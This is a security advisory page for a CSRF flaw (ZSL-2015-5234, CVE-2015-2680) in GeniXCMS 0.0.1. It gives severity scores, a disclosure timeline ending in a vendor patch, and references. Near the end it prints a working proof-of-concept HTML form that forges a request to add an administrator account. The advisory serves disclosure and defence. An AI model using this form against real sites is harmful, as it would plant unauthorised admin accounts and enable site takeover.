Gjoko KrsticZSL-2015-5234GeniXCMS v0.0.1 CSRF Add Admin Exploit
6.8 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
8.6 High
AI Score
Confidence
High
0.01 Low
EPSS
Percentile
83.9%
Title: GeniXCMS v0.0.1 CSRF Add Admin Exploit
Advisory ID: ZSL-2015-5234
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 10.03.2015
Summary
GenixCMS is a PHP Based Content Management System and Framework (CMSF). It’s a simple and lightweight of CMSF. Very suitable for Intermediate PHP developer to Advanced Developer. Some manual configurations are needed to make this application to work.
Description
The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.
Vendor
MetalGenix - <http://www.genixcms.org>
Affected Version
0.0.1
Tested On
nginx/1.4.6 (Ubuntu)
Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vendor Status
[05.03.2015] Vulnerability discovered.
[05.03.2015] Vendor contacted.
[06.03.2015] Vendor responds asking more details.
[06.03.2015] Sent details to the vendor.
[07.03.2015] Vendor promises fix soon.
[10.03.2015] Vendor releases patched version.
[10.03.2015] Public security advisory released.
PoC
Credits
Vulnerability discovered by Gjoko Krstic - <[email protected]>
References
[1] <http://blog.metalgenix.com/update-security-fix-and-add-newsletter-module/16>
[2] <https://github.com/semplon/GeniXCMS/commit/698245488343396185b1b49e7482ee5b25541815>
[3] <http://www.exploit-db.com/exploits/36321/>
[4] <http://osvdb.org/show/osvdb/119391>
[5] <http://cxsecurity.com/issue/WLB-2015030065>
[6] <http://packetstormsecurity.com/files/130772>
[7] <https://exchange.xforce.ibmcloud.com/#/vulnerabilities/101499>
[8] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2015-2680>
[9] <https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2680>
Changelog
[10.03.2015] - Initial release
[11.03.2015] - Added reference [4], [5] and [6]
[13.03.2015] - Added reference [7]
[24.03.2015] - Added reference [8] and [9]
Contact
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>GeniXCMS v0.0.1 CSRF Add Admin Exploit
Vendor: MetalGenix
Product web page: http://www.genixcms.org
Affected version: 0.0.1
Summary: GenixCMS is a PHP Based Content Management System and Framework (CMSF).
It's a simple and lightweight of CMSF. Very suitable for Intermediate PHP developer to
Advanced Developer. Some manual configurations are needed to make this application to
work.
Desc: The application allows users to perform certain actions via HTTP requests without
performing any validity checks to verify the requests. This can be exploited to perform
certain actions with administrative privileges if a logged-in user visits a malicious web
site.
Tested on: nginx/1.4.6 (Ubuntu)
Apache 2.4.10 (Win32)
PHP 5.6.3
MySQL 5.6.21
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5234
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5234.php
05.03.2015
---
</p>
<form action="http://localhost/genixcms/gxadmin/index.php?page=users" method="POST">
<input name="userid" type="hidden" value="Testingus"/>
<input name="pass1" type="hidden" value="123456"/>
<input name="pass2" type="hidden" value="123456"/>
<input name="email" type="hidden" value="[email protected]"/>
<input name="group" type="hidden" value="0"/>
<input name="adduser" type="hidden" value=""/>
<input type="submit" value="Forge!"/>
</form>
</body></html>Related
6.8 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
8.6 High
AI Score
Confidence
High
0.01 Low
EPSS
Percentile
83.9%